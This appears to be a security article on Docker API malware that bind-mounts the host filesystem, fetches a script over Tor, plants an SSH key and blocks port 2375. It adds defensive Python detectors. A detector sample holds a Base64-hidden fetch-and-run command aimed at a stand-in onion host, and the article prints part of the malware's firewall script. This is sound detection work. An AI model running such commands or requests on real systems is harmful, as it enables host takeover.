A sophisticated malware strain targeting exposed Docker APIs has emerged with enhanced infection capabilities that go beyond traditional cryptomining operations.
The threat, discovered in August 2025, demonstrates evolved tactics designed to establish persistent root access while denying other attackers access to compromised systems.
The malware represents a significant evolution from a variant originally reported by Trend Micro in June 2025.
While the initial strain focused primarily on cryptocurrency mining operations hidden behind Tor infrastructure, this new iteration exhibits more complex behavior patterns.
The attack begins by exploiting misconfigured Docker APIs reachable from the internet, specifically TCP port 2375, the Docker daemon's conventional unencrypted remote API port, which some administrators have exposed without TLS or any other authentication.
The infection starts when the attackers use that API to create a container from an Alpine Linux image and bind-mount the host filesystem into it, giving code running inside the container root-level access to the host's files.
The container's command is a Base64-encoded payload that decodes to a command downloading and executing a shell script from a Tor hidden service, which in turn establishes multiple persistence mechanisms on the compromised system.
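The request pattern described above is visible to anyone who can see the daemon's API traffic (an audit log of the Engine API, or a reverse proxy in front of it). The following Python is an added example written for this page, not code from the article or from Akamai: it scores a POST /containers/create body for the indicators the paragraph describes (a sensitive host path bind-mounted in, a decode-and-execute one-liner, and a Tor reference, including one hidden inside the Base64). The request bodies are constructed samples and the indicator labels are my own.

```python
"""Flag Docker Engine API container-create requests that match the pattern
described above: a host filesystem bind-mounted into the container and a
Base64-encoded decode-and-execute command. Added example, not code from the
article or from Akamai; the request bodies are constructed and the indicator
names are my own."""
import base64
import binascii
import re

# Host paths whose bind mount hands the container control of the host.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock"}
# "... | base64 -d | sh" style one-liners used to hide the real command.
DECODE_EXEC_RE = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b", re.I)
# v2 (16 chars) and v3 (56 chars) onion hostnames.
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.I)
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _host_mounts(host_config):
    """Yield host-side paths from HostConfig.Binds ("src:dst[:opts]") and HostConfig.Mounts."""
    for bind in host_config.get("Binds") or []:
        yield bind.split(":", 1)[0]
    for mount in host_config.get("Mounts") or []:
        if mount.get("Type") == "bind":
            yield mount.get("Source", "")


def _command_text(body):
    """Join Entrypoint and Cmd (each may be a list or a string) into one searchable line."""
    parts = []
    for key in ("Entrypoint", "Cmd"):
        value = body.get(key)
        if isinstance(value, str):
            parts.append(value)
        elif isinstance(value, list):
            parts.extend(str(v) for v in value)
    return " ".join(parts)


def _decoded_fragments(text):
    """Decode every Base64-looking token so indicators hidden in the payload become visible."""
    for token in B64_TOKEN_RE.findall(text):
        try:
            yield base64.b64decode(token, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid Base64 (e.g. a path that only looks like it)


def classify_container_create(body):
    """Return indicator labels for one POST /containers/create body (empty list = nothing seen)."""
    hits = []
    host_config = body.get("HostConfig") or {}
    mounted = sorted(p for p in _host_mounts(host_config) if p in SENSITIVE_HOST_PATHS)
    if mounted:
        hits.append("host-filesystem-mount:" + ",".join(mounted))
    if host_config.get("Privileged"):
        hits.append("privileged")
    if host_config.get("PidMode") == "host":
        hits.append("pid-namespace-host")
    cmdline = _command_text(body)
    if DECODE_EXEC_RE.search(cmdline):
        hits.append("base64-decode-exec")
    searchable = [cmdline, *_decoded_fragments(cmdline)]
    if any(ONION_RE.search(s) or "torsocks" in s for s in searchable):
        hits.append("tor-reference")
    return hits


# Constructed sample requests (not captured traffic). The hidden command is
# encoded here so the decode step has something realistic to unpack.
HIDDEN_COMMAND = "torsocks wget -qO- http://abcdefghijklmnop.onion/stage2.sh | sh"
MALICIOUS_CREATE = {
    "Image": "alpine:latest",
    "Cmd": ["sh", "-c", "echo " + base64.b64encode(HIDDEN_COMMAND.encode()).decode() + " | base64 -d | sh"],
    "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True},
}
BENIGN_CREATE = {
    "Image": "nginx:1.27",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
}

if __name__ == "__main__":
    for name, body in (("malicious", MALICIOUS_CREATE), ("benign", BENIGN_CREATE)):
        print(name, classify_container_create(body) or "no indicators")
```

The decode step matters more than it looks: the outer command line of the sample contains no `.onion` string at all, and only unpacking the Base64 token exposes the Tor fetch. A bind of `/` to any target path is treated the same as `Privileged`, since either one is enough for the container to write `/root/.ssh/authorized_keys` or a crontab on the host.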
Akamai analysts identified this variant during routine honeypot monitoring, noting distinct behavioral differences from previously documented attacks.
The researchers observed that, unlike its predecessors, this strain actively locks competing attackers out of the same vulnerable systems once it has taken them over.
Advanced Persistence and Defense Evasion Mechanisms
The malware’s most notable advancement lies in its comprehensive approach to maintaining exclusive access to compromised infrastructure.
After initial compromise, the attack deploys a script called docker-init.sh that layers several persistence and defensive measures on top of each other.
The persistence mechanism operates through several coordinated actions. First, the malware appends an attacker-controlled SSH public key to /root/.ssh/authorized_keys, giving the attacker direct root login over SSH that no longer depends on the Docker API staying exposed.
Subsequently, it installs a cron job that runs every minute and re-applies a rule blocking inbound TCP port 2375, using whichever firewall front ends are present on the host: firewall-cmd, ufw, pfctl, iptables, or nft.
PORT=2375
PROTOCOL=tcp
# For each firewall front end installed on the host, add a rule rejecting the Docker API port.
for fw in firewall-cmd ufw pfctl iptables nft; do
  if command -v "$fw" >/dev/null 2>&1; then
    case "$fw" in
      firewall-cmd)
        # Permanent rich rule rejecting inbound TCP/2375 in the public zone, then reload to apply it.
        firewall-cmd --permanent --zone=public --add-rich-rule="rule family='ipv4' port protocol='$PROTOCOL' port='$PORT' reject"
        firewall-cmd --reload
        ;;
      *)
        ;;  # branches for the other tools are not reproduced in this excerpt
    esac
  fi
done
This defensive blocking represents a territorial approach rarely seen in container-based attacks.
By systematically closing the Docker API port that enabled their initial access, the attackers prevent other malicious actors from exploiting the same vulnerability while maintaining their established foothold through SSH access.
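Both persistence artifacts described above leave traces a responder can check for on the host: an unfamiliar key in /root/.ssh/authorized_keys and an every-minute cron entry that touches port 2375 or a firewall tool. The Python below is an added example for this page, not code from the article or from Akamai. It computes OpenSSH-style SHA256 fingerprints so keys can be compared against an allowlist, and scans crontab text for the cron pattern. The authorized_keys and crontab contents are constructed samples, and the allowlist of fingerprints stands in for a local inventory the reader would have to supply.

```python
"""Host-side checks for the two persistence mechanisms described above: an
SSH public key appended to /root/.ssh/authorized_keys and a once-a-minute
cron job that re-applies a firewall block on TCP/2375. Added example, not
code from the article or from Akamai; the authorized_keys and crontab
contents are constructed samples and the allowlist is an assumed inventory."""
import base64
import binascii
import hashlib
import re

FIREWALL_TOOLS = ("iptables", "ip6tables", "nft", "ufw", "firewall-cmd", "pfctl")
DOCKER_API_PORT = "2375"
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def ssh_fingerprint(key_line):
    """OpenSSH-style SHA256 fingerprint of one authorized_keys line, or None if it does not parse."""
    fields = key_line.split()
    # The key type may be preceded by an options field such as command="..." or no-pty.
    for i, field in enumerate(fields):
        if field.startswith(KEY_TYPE_PREFIXES) and i + 1 < len(fields):
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except (binascii.Error, ValueError):
                return None
            digest = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
            return "SHA256:" + digest
    return None


def unexpected_authorized_keys(text, allowed_fingerprints):
    """Return (fingerprint, line) for every key whose fingerprint is not in the allowlist."""
    unknown = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fp = ssh_fingerprint(line)
        if fp is None or fp not in allowed_fingerprints:
            unknown.append((fp, line))
    return unknown


def suspicious_cron_entries(text):
    """Flag every-minute jobs that reference the Docker API port or a firewall front end.

    Works on user crontabs (five schedule fields then the command) and on
    /etc/cron.d files, where the user name simply becomes part of the command
    string. @reboot-style shortcuts have fewer fields and are skipped here."""
    flagged = []
    port_re = re.compile(r"\b" + DOCKER_API_PORT + r"\b")
    tool_re = re.compile(r"\b(?:" + "|".join(re.escape(t) for t in FIREWALL_TOOLS) + r")\b")
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        schedule, command = fields[:5], fields[5]
        if schedule == ["*"] * 5 and (port_re.search(command) or tool_re.search(command)):
            flagged.append(line)
    return flagged


# Constructed samples (not from a real host). The blobs are valid Base64 of the
# right length for an Ed25519 public key but are not real keys.
KNOWN_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI" + "A" * 43 + " ops@admin"
PLANTED_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI" + "B" * 43
AUTHORIZED_KEYS = "# managed by ops\n" + KNOWN_KEY + "\n" + PLANTED_KEY + "\n"
ALLOWED_FINGERPRINTS = {ssh_fingerprint(KNOWN_KEY)}

ROOT_CRONTAB = """\
0 3 * * * /usr/local/sbin/backup.sh
*/5 * * * * /usr/bin/certbot renew --quiet
* * * * * iptables -C INPUT -p tcp --dport 2375 -j DROP || iptables -I INPUT -p tcp --dport 2375 -j DROP
"""

if __name__ == "__main__":
    for fp, line in unexpected_authorized_keys(AUTHORIZED_KEYS, ALLOWED_FINGERPRINTS):
        print("unexpected key", fp, line)
    for line in suspicious_cron_entries(ROOT_CRONTAB):
        print("suspicious cron", line)
```

Comparing fingerprints rather than raw lines keeps the check stable when a key's comment field changes, and the same fingerprints can be matched against sshd's "Accepted publickey" log lines to see whether the planted key has already been used.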
The malware also installs masscan for fast network scanning, along with torsocks for routing its tooling's traffic over Tor.
These components enable the malware to identify and compromise additional vulnerable Docker instances across the network, creating potential for large-scale botnet operations.
The combination of persistent access, competitive exclusion, and propagation capabilities positions this malware as a significant threat to containerized environments.